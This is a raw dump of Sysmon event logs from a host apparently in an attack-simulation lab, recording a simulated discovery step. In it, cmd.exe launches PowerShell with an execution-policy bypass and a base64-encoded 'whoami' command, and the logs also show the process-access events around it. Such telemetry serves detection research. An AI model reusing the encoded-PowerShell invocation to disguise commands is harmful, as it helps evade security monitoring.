10341000x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.735{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E6F-6005-8500-00000000A301}47844880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e1a32a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d643e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e0f5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d604997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d662e6
6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6464cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6464cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d64635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6382e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d643e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e0f5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d62ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d62a232(wow64) 154100x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.733{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating 
SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.673{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.673{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.626{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rtjt3zuv.0er.ps12021-01-18 13:34:39.626 10341000x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.595{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8400-00000000A301}47724776C:\Windows\system32\cmd.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.583{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 